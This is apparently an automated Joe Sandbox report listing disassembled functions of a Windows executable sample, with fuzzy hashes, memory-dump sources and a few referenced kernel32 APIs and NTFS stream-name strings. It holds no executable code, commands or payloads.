Opcode Fuzzy Hash: 1df1e6e81a57214c8643d36be1bb9cde3812740f73d4ab830297bee2ffae98a2
Instruction Fuzzy Hash: BE8227B7A09AC186EB05DF24E8042FDBBA1E751FA8F598136CA4F47395DA3CD449D320

Function 00007FF7161176C0 Relevance: .9, Instructions: 893COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
Instruction ID: bceb568bdeacbd0226baa66baf8c367424d0d91c65449df0241667c745f4080d
Opcode Fuzzy Hash: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
Instruction Fuzzy Hash: 6D627D9AD3AF9A1EE303A53954131D2E35C0EF74C9551E31BFCE431E66EB92A6832314

Function 00007FF7161353F0 Relevance: .9, Instructions: 891COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83a45c88a368d7276059de07aefbbc35b61cea5d64746511b72f3674958eea04
Instruction ID: 869f0103164a58ba5060d56d528e934602168053ff28857be1fb3c81d57ecbda
Opcode Fuzzy Hash: 83a45c88a368d7276059de07aefbbc35b61cea5d64746511b72f3674958eea04
Instruction Fuzzy Hash: D48212B3A09AC08AE714DF28E8046FDBB61F755F68F498136CA4E47789DA3CD449D720

Function 00007FF71612BB90 Relevance: .6, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
Instruction ID: 2c2535be37ec29c6c43142eecdc327285c794f2ca1e7b15539d7107d00e15af1
Opcode Fuzzy Hash: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
Instruction Fuzzy Hash: A822E5B3B246508BD728CF15DC9AA5E3766F798744B4B8228DF0ACB785DB38D509CB40

Function 00007FF716134B98 Relevance: .6, Instructions: 578COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
Instruction ID: 00fd66eba42941fce57c649cf32c9b9c20b0871e21488a035e4ce217472ba6df
Opcode Fuzzy Hash: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
Instruction Fuzzy Hash: 13321273A049818BE71CDF28E940ABD77A1F754B28F418139DA4B87B88DB3CE858D750

Function 00007FF716117288 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
Instruction ID: 933293837486149b7c45460d9830e503d5d042d67b2288308a96b62541f3419f
Opcode Fuzzy Hash: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
Instruction Fuzzy Hash: C6C1BDB7B281908FE350CF7AE400AAD7BB1F39878CB519125DF59A3B09D639E605CB40

Function 00007FF716132D58 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
Instruction ID: 87dbebf23f550408d188bbdc645d2d61c0fe26a37403430819bf81fccb36776b
Opcode Fuzzy Hash: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
Instruction Fuzzy Hash: AEA14673A0898286FB15FA25E8047FFA691EB90774F958135DA4F47785CE3CE849E320

Function 00007FF71612AF18 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
Instruction ID: 0d047f24a6149f97b40eeab5e36a7777559bcbe52e8d29d9b175f65e938dbe17
Opcode Fuzzy Hash: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
Instruction Fuzzy Hash: B5C11573A296E08DF302CBB5A4248FD3FB2F71E30DB4A4151EF9656B4AD6285205DB30

Function 00007FF71611A310 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
Instruction ID: b2d250f9703b1622788b8a0fe2d536f67de5ac46d335309fd1ed0585d26fa3e4
Opcode Fuzzy Hash: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
Instruction Fuzzy Hash: 36910263B1898196FB11EF29E8502EEA761FF95798F841031EF4E07649EF38D64AD310

Function 00007FF71612B534 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
Instruction ID: 9f33c09932a8880d08e496228cb1b3c3bbc40d4061ad18a8a860cf53ab773836
Opcode Fuzzy Hash: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
Instruction Fuzzy Hash: 26614623B089D189FB01DF7599004FEBFB2B719798B958036CE9A57646CB3CE109DB20

Function 00007FF7161321D0 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
Instruction ID: 7a5aa623b35441a0ef5af67c2c1ba361aa97a4a5501251ab1a72f7bb4c68cddb
Opcode Fuzzy Hash: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
Instruction Fuzzy Hash: B8512373A185514BF728EF28E9047AEB751F784B64F848130DB4A47688DE3DE548EB10

Function 00007FF716132AB0 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
Instruction ID: ee9b6289616ad0c9c18ac360ddb359417b6d670ccadbfb58e1c91f0d060989f3
Opcode Fuzzy Hash: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
Instruction Fuzzy Hash: 9931F6B2A089919BE708EE16E9506BFB7E1F744760F54C139DB4687B81DA3CE049D710

Function 00007FF7161558E0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
Instruction ID: b5115d6b47e9a8e6e21cd1de9ce31824c06f150425cb8fc1cd45c7c003f54089
Opcode Fuzzy Hash: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
Instruction Fuzzy Hash: 0DF062B2B186958BEBA49F2DB84362AB7E1F708390F848439D68D83B14D63C94649F14

Function 00007FF716143354 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
Instruction ID: 94ee75fbf8372b6dbbd146b92401b7087872a9b4377bd2537cee7306d8b2d39b
Opcode Fuzzy Hash: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
Instruction Fuzzy Hash: 9EA00161908C52D0F685EB55BC60172A230BB51321B914071E40D420A8AF2CA409A220

Function 00007FF71611D7D0 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 98COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611D964

Strings

::$FILE_NAME, xrefs: 00007FF71611D833
::$ATTRIBUTE_LIST, xrefs: 00007FF71611D7FC
:$I30:$INDEX_ALLOCATION, xrefs: 00007FF71611D849
::$LOGGED_UTILITY_STREAM, xrefs: 00007FF71611D85F
::$EA, xrefs: 00007FF71611D81D
:$TXF_DATA:$LOGGED_UTILITY_STREAM, xrefs: 00007FF71611D875
::$REPARSE_POINT, xrefs: 00007FF71611D88B
::$INDEX_ALLOCATION, xrefs: 00007FF71611D83E
::$OBJECT_ID, xrefs: 00007FF71611D880
::$BITMAP, xrefs: 00007FF71611D807
::$INDEX_ROOT, xrefs: 00007FF71611D854
::$EA_INFORMATION, xrefs: 00007FF71611D828
::$DATA, xrefs: 00007FF71611D812
:$EFS:$LOGGED_UTILITY_STREAM, xrefs: 00007FF71611D86A

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
API String ID: 3668304517-727060406
Opcode ID: 9722f19d9730c17eaeca2eefbf6c05556aeae8c55d78850e8e2a1aeae63cce70
Instruction ID: 4312ce76ba22b5bbdc53648531f829c2018c0bbe9c36dfe813b8c9b807a3b93e
Opcode Fuzzy Hash: 9722f19d9730c17eaeca2eefbf6c05556aeae8c55d78850e8e2a1aeae63cce70
Instruction Fuzzy Hash: 0441F776A05F0599FB40AB64E8513EAB3B9EB097A8F810236DE4C03768EF38D159D350

Function 00007FF716142A10 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF716142A26
GetModuleHandleW.KERNEL32 ref: 00007FF716142A33
GetModuleHandleW.KERNEL32 ref: 00007FF716142A48
GetProcAddress.KERNEL32 ref: 00007FF716142A60
GetProcAddress.KERNEL32 ref: 00007FF716142A73
CreateEventW.KERNEL32 ref: 00007FF716142A9F
DeleteCriticalSection.KERNEL32 ref: 00007FF716142AEB
CloseHandle.KERNEL32 ref: 00007FF716142AFD

Strings

SleepConditionVariableCS, xrefs: 00007FF716142A56
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00007FF716142A2C
WakeAllConditionVariable, xrefs: 00007FF716142A66
kernel32.dll, xrefs: 00007FF716142A41

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
